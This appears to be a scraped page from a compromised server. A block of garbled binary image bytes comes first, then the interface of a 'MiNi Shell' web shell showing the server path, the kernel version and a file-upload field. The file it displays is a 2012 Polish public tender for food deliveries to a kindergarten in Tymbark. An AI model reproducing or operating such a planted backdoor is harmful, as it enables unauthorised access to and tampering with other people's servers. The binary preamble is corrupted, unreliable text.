JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120425/132540-N-2012.html

<p class="kh_header"><b>Tymbark: Dostawa artykułów żywnościowych dla Publicznego Przedszkola Samorządowego z Oddziałami Integracyjnymi w Tymbarku.</b><br>
<b>Numer ogłoszenia: 132540 - 2012; data zamieszczenia: 25.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Przedszkole Samorządowe , Tymbark 495, 34-650 Tymbark, woj. małopolskie, tel. 18 3325170, faks 18 3325170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole.tymbark.iap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Publicznego Przedszkola Samorządowego z Oddziałami Integracyjnymi w Tymbarku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Publicznego Przedszkola Samorządowego z Oddziałami Integracyjnymi w Tymbarku, Tymbark 495 34-650 Tymbark. 
CZĘŚĆ I
OPIS PRZEDMIOTU ZAMÓWIENIA

Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-6, 03222300-6

1.	Marchew 	kg	400
2.	Pietruszka	kg	170
3.	Cebula 	kg	120
4.	Buraki 	kg	200
5.	Kapusta biała 	kg	300
6.	Kapusta czerwona 	kg	80
7.	Kapusta pekińska 	szt.	70
8.	Pomidory 	kg	60  
9.	Ogórki świeże 	kg	80
10.	Sałata zielona  	szt.	40
11.	Rzodkiewka 	pęczki	40
12.	Truskawki świeże 	kg	20
13.	Seler 	kg	20
14.	Por 	szt.	40
15.	Pieczarki świeże 	kg	40
16.	Banan 	kg	150
17.	Mandarynka 	kg	100
18.	Jabłko 	kg	550
19.	Śliwka świeża 	kg	10
20.	Kiwi świeże 	szt.	600
21.	Pomarańcza 	kg	100
22.	Nektarynka 	szt.	100
23.	Gruszka 	kg	30
24.	Klementynka 	kg	50
25.	Czosnek 	szt.	45
26.	Cytryna 	kg	40
27.	Groch mielony 	kg	23
28.	Fasola jasiek 	kg	25
29.	Kapusta kiszona 	kg	100
30.	Koper świeży  	pęczek	200
31.	Natka świeżej pietruszki 	pęczek	170
32.	Szczypiorek świeży 	pęczek	30
33.	Arbuz 	kg	150
34.	Ziemniaki 	kg	1 300

Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15811000-6

1.	Chleb kielecki 600 g 1 sztuka 	szt.	1 200
2.	Pączki 70 g 1 sztuka  	szt.	200
3.	Drożdżówka z formy 250 g 1sztuka 	szt.	300
4.	Bułka tarta 	kg	40
5.	Biszkopt z blachy 	kg	20
6.	Strucla makowa  	kg	10
7.	Bułki drożdżowe z serem  80g sztuka 	szt.	500
8.	Rogal z marmoladą  80g sztuka 	szt.	500

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15331170-9

1.	Mrożonka warzywna  500 g waga 1 sztuki   	szt.	150
2.	Brokuły mrożone 	kg	30
3.	Mieszanka kompotowa mrożona 0,50 kg waga 1 sztuki 	szt.	350
4.	Truskawki mrożone 500g 	szt.	250
5.	Fasolka szparagowa mrożona 	kg	30
6.	Kalafior mrożony 500 g waga 1 sztuki 	szt.	120
7.	Filet rybny panga	kg	50
8.	Filet rybny mintaj	kg	40
9.	Pierogi z truskawkami 	kg	70
10.	Pierogi z jabłkami 	kg	70
11.	Pierogi z serem 	kg	70
12.	Uszka z pieczarkami  	kg	15

Dostawa oznaczona jako Część IV artykuły spożywcze sypkie, koncentraty, przyprawy i desery :
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6

1.	Angielskie ziele 15g 1 opk.	opk.	7
2.	Budyń śmietankowy  30g 1 sztuka 	szt.	150
3.	Cukier 	kg	700
4.	Cukier waniliowy 30g 1 sztuka  	szt.	60
5.	Cukier puder 	kg	10
6.	Chrzan 180g 1 sztuka 	szt.	18 
7.	Cynamon mielony 20g 1 sztuka 	szt.	18
8.	Dżem truskawkowy 28g 1 sztuka 	szt.	130
9.	Vegeta 200g  sztuka 	szt.	80
10.	Herbatniki szkolne 50g 1 sztuka 	szt.	230
11.	Herbata granulowana 90g 1 sztuka 	szt.	110
12.	Kisiel 77g 1 sztuka  	szt.	157
13.	Kakao 80g 1 sztuka 	szt.	17
14.	Kawa zbożowa 200g 1 sztuka 	szt.	30
15.	Kasza mazurska 	kg	50
16.	Kwasek cytrynowy 20g 1 sztuka 	szt.	30
17.	Kasza manna 	kg	25
18.	Liść laurowy 7g 1 sztuka 	szt.	5
19.	Miód 370g 1 sztuka 	szt.	20
20.	Masło czekoladowe 350g 1 sztuka 	szt.	70
21.	Mąka 	kg	400
22.	Makaron wstążka 500g 1 sztuka 	szt.	150
23.	Makaron świder 500g 1 sztuka 	szt.	100
24.	Makaron łazanka 500g 1 sztuka 	szt.	50
25.	Makaron spagetti 500g 1 sztuka 	szt.	50
26.	Makaron nitka 250g 1 sztuka  	szt.	70
27.	Musztarda 175g 1 sztuka 	szt.	21
28.	Keczup 450g 1 sztuka 	szt.	30
29.	Maga 1kg 1 sztuka  	szt.	20
30.	Olej roślinny 1litr 1 sztuka 	szt.	100
31.	Koncentrat pomidorowy 850g 1 sztuka 	szt.	35
32.	Pieprz mielony 50g 1 sztuka 	szt.	35
33.	Proszek do pieczenia 36g 1 sztuka 	szt.	30
34.	Drożdże świeże 	kg	8
35.	Płatki miodowe 225g sztuka 	szt.	200
36.	Płatki kukurydziane 250g sztuka 	szt.	200
37.	Przecier ogórkowy 290g 1 sztuka 	szt.	120
38.	Papryka mielona 20g 1 sztuka 	szt.	35
39.	Ogórki konserwowe 880g 1 sztuka 	szt.	51
40.	Makrela w sosie pomidorowym 170g 1 sztuka 	szt.	80
41.	Ryz 	kg	70
42.	Ryż w saszetkach 400g 1 sztuka 	szt.	75
43.	Rosołki drobiowe 180g 1 sztuka 	szt.	90
44.	Sól 	kg	120
45.	Sos do spaghetti 520g 1 sztuka 	szt.	50
46.	Wafle kakaowe 	kg	30
47.	Żurek śląski 49g 1 sztuka 	szt.	90
48.	Zupa pieczarkowa 45g 1 sztuka 	szt.	90
49.	Smalec 200g 1 sztuka 	szt.	20
50.	Majeranek 10g 1 sztuka 	szt.	20
51.	Mąka ziemniaczana 	kg	10
52.	Kucharek 1kg 1 sztuka 	szt.	10
53.	Pierniki w czekoladzie serduszka 	kg	30
54.	Pierniki lukrowane serduszka 	kg	30
55.	Cukierki w czekoladzie 	kg	3
56.	Soczki w kartonie 	szt.	600
57.	Brzoskwinie w puszce 820 g waga 1 sztuki 	szt.	50
58.	Groszek konserwowy w puszce 400 gramowej 	szt.	50
59.	Pasztet drobiowy w puszce 160 g 	szt.	140


Dostawa oznaczona jako Część V  mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9

I Mięso świeże
1.	Kotlet wieprzowy bez kości 	kg	100
2.	Mięso wołowe pieczeniowe 	kg	100 
3.	Rozbrat 	kg	40
4.	Łopatka wieprzowa bez kości 	kg	150
5.	Mięso wieprzowe gulaszowe 	kg	30
6	Mięso wołowe gulaszowe  	kg	30
II Wędliny świeże
1.	Szynka wieprzowa 	kg	30
2.	Wędlina drobiowa 	kg	10
3.	Kiełbasa szynkowa ( wieprzowa ) 	kg	40
4.	Kiełbasa toruńska 	kg	50
5.	Boczek gotowany 	kg	10
6.	Mielonka wieprzowa 	kg	15
7.	Parówki drobiowe 	kg	100
III Mięso drobiowe świeże
1.	Wątróbka drobiowa 	kg	40
2.	Filet z kurczaka 	kg	120
3.	Porcje rosołowe 	kg	300
4.	Kurczak 	kg	120


Dostawa oznaczona jako Część VI  mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV):  15500000-3

1.	Mleko 2 % 0,9 litra 	szt.	1 700
2.	Śmietana 30% 400 g opakowanie 	szt.	600
3.	Ser twaróg tłusty 	kg	200
4.	Ser edamski tłusty 40% 	kg	40
5.	Serek topiony 60% 	szt.	70
6.	Jajka  	szt.	5 000
7.	Masło extra 200 g 1 sztuka 	szt.	150
8.	Margaryna palma 	kg	20
9	Jogurt gratka 	szt.	700
10.	Margaryna śniadaniowa 500 g 1 sztuka 	szt.	300
11.	Majonez kielecki 510 ml 1 sztuka 	szt.	35

Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Tymbarku 495. Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
Cykliczne dostawy  będą realizowane jak następuje: 

Część I świeże warzywa i owoce - w drugim dniu od złożenia zamówienia od
poniedziałku do piątku w godzinach od  8.00 do   14.00.
Część II  wyroby piekarskie - codziennie w drugim dniu od złożenia zamówienia od
poniedziałku do  piątku w godz. od 8.00   do  14.00.
Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia 
od poniedziałku do piątku w godz. od 8.00 do 14.00.
Część IV artykuły spożywcze sypkie, koncentraty, przyprawy i desery - w drugim     dniu od złożenia zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.
Część V  mięso świeże, wędliny i drób - w drugim     dniu  od złożenia zamówienia 
od poniedziałku do piątku w godz. od 8.00 do 14.00.
Część VI  mleko i produkty mleczarskie - codziennie  w drugim dniu od złożenia
zamówienia od poniedziałku do piątku w godz. od 8.00 do 14.00.

Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości.
Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych lub wyższych- produkty równoważne.
Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 

Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy.
Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia  zamówienia.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Dopuszcza się możliwość zamiany ilości poszczególnego asortymentu. 
Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
Do składania zamówień Zamawiający upoważni wybranego pracownika..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który: 1)wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej dwie dostawy artykułów żywnościowych, Ocena spełniania przez Wykonawcę warunków udziału w postępowaniu będzie dokonana na podstawie złożonych przez Wykonawcę oświadczeń, o których mowa w części IV pkt 1 i 2 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.tymbark. pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Przedszkole Samorządowe z Oddziałami Integracyjnymi w Tymbarku 34-650 Tymbark 495 - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2012 godzina 10:00, miejsce: Publiczne Przedszkole Samorządowe z Oddziałami Integracyjnymi w Tymbarku 34-650 Tymbark 495 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com